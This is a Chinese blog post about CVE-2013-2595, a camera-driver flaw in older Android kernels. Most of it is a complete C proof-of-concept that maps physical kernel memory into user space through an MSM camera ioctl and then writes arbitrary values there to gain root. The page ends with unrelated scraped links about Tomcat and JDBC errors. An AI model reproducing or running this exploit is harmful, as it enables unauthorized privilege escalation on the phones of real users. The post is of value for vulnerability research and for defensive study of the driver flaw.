Uncontrolled memory mapping in camera driver (CVE-2013-2595)
版权声明:本文为博主原创文章。未经博主同意不得转载。
https://blog.csdn.net/hu3167343/article/details/34434235
/*
本文章由 莫灰灰 编写,转载请注明出处。
作者:莫灰灰 邮箱:
minzhenfei@163.com
*/
1漏洞描写叙述
漏洞的产生主要是由于摄像头驱动提供了几个用于用户空间调用的接口。
用户空间能够使用诸如ioctl或者mmap这种系统调用函数就能对摄像头驱动产生影响。黑客能够非常easy的使用事先构造好的參数将物理内存map到用户空间,并提升权限。
2.影响设备
绝大多数使用2013年5月1日之前的Linux内核安卓系统
3.PoC
/*
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*/
#include <stdint.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/fb.h>
#include <string.h>
#include "msm_cameraconfig.h"
#define MSM_CAM_IOCTL_MAGIC 'm'
struct msm_mem_map_info {
uint32_t cookie;
uint32_t length;
uint32_t mem_type;
};
#define MSM_CAM_IOCTL_SET_MEM_MAP_INFO \
_IOR(MSM_CAM_IOCTL_MAGIC, 41, struct msm_mem_map_info *)
#define MSM_MEM_MMAP 0
#define KERNEL_VIRT_ADDRESS 0xc0000000
#define MAPPED_BASE 0x20000000
#define KERNEL_SIZE 0x02000000
static bool kernel_phys_offset_initialized = false;
static unsigned long kernel_phys_offset = 0;
static int
get_cpu_implementer(void)
{
FILE *fp;
char name[BUFSIZ];
char value[BUFSIZ];
int ret;
long int implementer = 0;
fp = fopen("/proc/cpuinfo", "r");
if (!fp) {
printf("Failed to open /proc/cpuinfo due to %s.", strerror(errno));
return 0;
}
while ((ret = fscanf(fp, "%[^:]: %[^\n]\n", name, value)) != EOF) {
if (!strncmp(name, "CPU implementer", 15)) {
implementer = strtol(value, NULL, 16);
break;
}
}
fclose(fp);
return implementer;
}
static unsigned long int
detect_kernel_phys_address_from_cpuinfo(void)
{
int implementer;
implementer = get_cpu_implementer();
switch (implementer) {
case 'Q': // 0x51
return 0x80200000;
}
return 0x80000000;
}
static unsigned long int
get_system_ram_address_from_iomem(void)
{
FILE *fp;
char name[BUFSIZ];
void *start_address, *end_address;
void *system_ram_address = NULL;
int ret;
fp = fopen("/proc/iomem", "r");
if (!fp) {
printf("Failed to open /proc/iomem due to %s.\n", strerror(errno));
return false;
}
while ((ret = fscanf(fp, "%p-%p : %[^\n]", &start_address, &end_address, name)) != EOF) {
if (!strcmp(name, "System RAM")) {
system_ram_address = start_address;
continue;
}
if (!strncmp(name, "Kernel", 6)) {
break;
}
}
fclose(fp);
return (unsigned long int)system_ram_address;
}
static bool
detect_kernel_phys_parameters(void)
{
unsigned long int system_ram_address;
system_ram_address = get_system_ram_address_from_iomem();
if (!system_ram_address) {
system_ram_address = detect_kernel_phys_address_from_cpuinfo();
}
kernel_phys_offset_initialized = true;
kernel_phys_offset = system_ram_address;
return true;
}
void *
msm_cameraconfig_convert_to_mmaped_address(void *address, void *mmap_base_address)
{
return mmap_base_address + (uint32_t)address - KERNEL_VIRT_ADDRESS;
}
bool
msm_cameraconfig_write_value_at_address(unsigned long int address, int value)
{
void *mmap_address = NULL;
int *write_address;
int fd_video;
int fd_config;
mmap_address = msm_cameraconfig_mmap(&fd_video, &fd_config);
if (mmap_address == MAP_FAILED) {
return false;
}
write_address = msm_cameraconfig_convert_to_mmaped_address((void*)address, mmap_address);
*write_address = value;
msm_cameraconfig_munmap(mmap_address, fd_video, fd_config);
return true;
}
bool
msm_cameraconfig_run_exploit(bool(*exploit_callback)(void *mmap_base_address, void *user_data),
void *user_data)
{
void *mapped_address = NULL;
int fd_video;
int fd_config;
bool success;
mapped_address = msm_cameraconfig_mmap(&fd_video, &fd_config);
if (mapped_address == MAP_FAILED) {
return false;
}
success = exploit_callback(mapped_address, user_data);
msm_cameraconfig_munmap(mapped_address, fd_video, fd_config);
return success;
}
void
msm_cameraconfig_set_kernel_phys_offset(int offset)
{
kernel_phys_offset_initialized = true;
kernel_phys_offset = offset;
}
void *
msm_cameraconfig_mmap(int *fd_video, int *fd_config)
{
struct msm_mem_map_info args;
void *mapped_address;
if (!kernel_phys_offset_initialized && !detect_kernel_phys_parameters()) {
printf("This machine can not use msm_cameraconfig exploit.\n");
return MAP_FAILED;
}
*fd_video = open("/dev/video0", O_RDWR);
if (*fd_video < 0) {
goto error_exit;
}
*fd_config = open("/dev/msm_camera/config0", O_RDWR);
if (*fd_config < 0) {
goto error_exit;
}
args.cookie = kernel_phys_offset;
args.length = KERNEL_SIZE;
args.mem_type = MSM_MEM_MMAP;
if (ioctl(*fd_config, MSM_CAM_IOCTL_SET_MEM_MAP_INFO, &args) < 0) {
goto error_exit;
}
mapped_address = mmap((void *)MAPPED_BASE, KERNEL_SIZE, PROT_READ | PROT_WRITE,
MAP_SHARED, *fd_config, kernel_phys_offset);
if (mapped_address == MAP_FAILED) {
goto error_exit;
}
return mapped_address;
error_exit:
if (*fd_config >= 0) {
close(*fd_config);
*fd_config = -1;
}
if (*fd_video >= 0) {
close(*fd_video);
*fd_video = -1;
}
return MAP_FAILED;
}
int
msm_cameraconfig_munmap(void *address, int fd_video, int fd_config)
{
if (address != MAP_FAILED) {
int ret;
ret = munmap(address, KERNEL_SIZE);
if (ret < 0) {
printf("Failed to munmap due to %s\n", strerror(errno));
return ret;
}
}
close(fd_config);
close(fd_video);
return 0;
}
4.漏洞修复
5.总结
1.漏洞的利用事实上和Root exploit on Exynos(CVE-2012-6422)几乎相同。仅仅是map物理内存的方法不同罢了。
2.其次,这个漏洞的补丁也非常奇特,仅仅是简单的把相关漏洞代码删掉了。
预计是胡乱抄代码模板导致的漏洞,哈哈。
Uncontrolled memory mapping in camera driver (CVE-2013-2595)的更多相关文章
- The web application registered the JDBC driver * but failed to unregister it when the web application was stopped. To prevent a memory leak, the JDBC Driver has been forcibly unregistered.
最近使用了最新版的tomcat9,使用jdbc链接mysql数据库.关闭tomcat过程中出现警告 13-Sep-2017 22:22:54.369 WARNING [main] org.apache ...
- The web application [ ] registered the JDBC driver [net.sourceforge.jtds.jdbc.Driver] but failed to unregister it when the web application was stopped. To prevent a memory leak, the JDBC Driver
出现以下错误时,我找了很多方法,都未解决,网上有很多,最后我实在无奈,怀疑会不会是Tomcat的原因,更换了一个版本之后就好了.The web application [ ] registered t ...
- registered the JDBC driver [com.mysql.jdbc.Driver] but failed to unregister it when the web application was stopped. To prevent a memory leak, the JDBC Driver has been forcibly unregistered.
问题是tomcat的版本问题,tomcat新检测机制导致的这个问题,换版本可以解决问题,但不建议这么做,租用服务器不是你说换就换的.其实问题根源是BasicDataSource,BasicDataSo ...
- 解决:The web application [] registered the JDBC driver [] but failed to unregister it when the web application was stopped. To prevent a memory leak, the JDBC Driver has been forcibly unregistered.
问题描述 在将Spring Boot程序打包生成的war包部署到Tomcat后,启动Tomcat时总是报错,但是直接在IDEA中启动Application或者用"java -jar" ...
- msm8974 camera driver添加新摄像头kernel hal修改
添加一款新摄像头流程 1添加sensor kernel driver, 主要实现上电.rst.pwd.mclk等power setting,sensor prob & sensor i2c ...
- Visual Studio 2013 新功能 Memory Dump 分析器
本文为 Dennis Gao 原创技术文章,发表于博客园博客,未经作者本人允许禁止任何形式的转载. TechEd2013 发现新功能 12月5日和6日,在国家会议中心参加了微软的 TechEd2013 ...
- 严重: The web application [] registered the JDBC driver [com.microsoft.sqlserver.jdbc.SQLServerDriver] but failed to unregister it when the web application was stopped. To prevent a memory leak, the JDB
idea项目启动报如下错误, 网上的方法都试了都没用, 一直没解决, 干掉项目, 重新从svn检出就好了...坑 啊 Root WebApplicationContext: initializatio ...
- check camera and driver
1. How to check $ ls /dev/video* /dev/video0 /dev/video1 /dev/video2 /dev/video3 if not, U should ch ...
- Tomcat运行一段时间后,自动停止关闭,To prevent a memory leak,Druid 数据库连接自动关闭, the JDBC Driver has been forcibly unregistered.
1. Tomcat 错误日志 tail -100f tomcat9/logs/catalina.out 21-Sep-2017 23:05:39.301 INFO [Thread-5] org.apa ...
随机推荐
- 通信原理之UDP协议(四)
1.UDP简要介绍 UDP是传输层协议,和TCP协议处于一个分层中,但是与TCP协议不同,UDP协议并不提供超时重传,出错重传等功能,也就是说其是不可靠的协议. 2.UDP协议头 2.1.UDP端口号 ...
- 轮滑基础(一)(前摔,葫芦步,推步,A字转弯,弓步转弯)
轮滑新手入门推荐? [柚子陪你学轮滑轮滑教学]第一集 轮滑安全 1,站: 站立:脚可以成v字,或者平行,手放膝盖或者前伸.平行站立 膝盖相距一拳头左右,两腿间距略小于肩宽.膝盖略弯,腰下压,抬头挺胸 ...
- day_4_25 py
''' 递归: 如果一个函数在内部不调用其它的函数, 而是自己本身的话,这个函数就是递归函数 ''' def factor(num): if num >1: result = num*facto ...
- Solr-全文检索工具简介
一.Solr的简介 Solr 是Apache下的一个顶级开源项目,采用Java开发,它是基于Lucene的全文搜索服务.Solr可以独立运行在Jetty.Tomcat等这些Servlet容器中.都是W ...
- Slapper帮助Dapper实现一对多
Dapper的Query的方法提供了多个泛型重载可以帮助我们实现导航属性的查询 1对1 public class Employees4List { public int Id { get; set; ...
- 通过Java语言连接mysql数据库
1加载驱动 2创建链接对象 3创建语句传输对象 4接受结果集 5遍历 6关闭资源
- AJAX基本操作 + 登录 + 删除 + 模糊查询
AJAX练习显示页面 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...
- [No000013D].Net 项目代码风格参考
1. C#代码风格要求 1.1 注释 类型.属性.事件.方法.方法参数,根据需要添加注释. 如果类型.属性.事件.方法.方法参数的名称已经是自解释了,不需要加注释:否则需要添加注释. 当添加注释时,添 ...
- [No0000100]正则表达式匹配解析过程分析(正则表达式匹配原理)&regexbuddy使用&正则优化
常见正则表达式引擎引擎决定了正则表达式匹配方法及内部搜索过程,了解它至关重要的.目前主要流行引擎有:DFA,NFA两种引擎. 引擎 区别点 DFA Deterministic finite autom ...
- hadoop内存配置方案
Configuration File Configuration Setting Value Calculation 8G VM (4G For MR) yarn-site.xml ...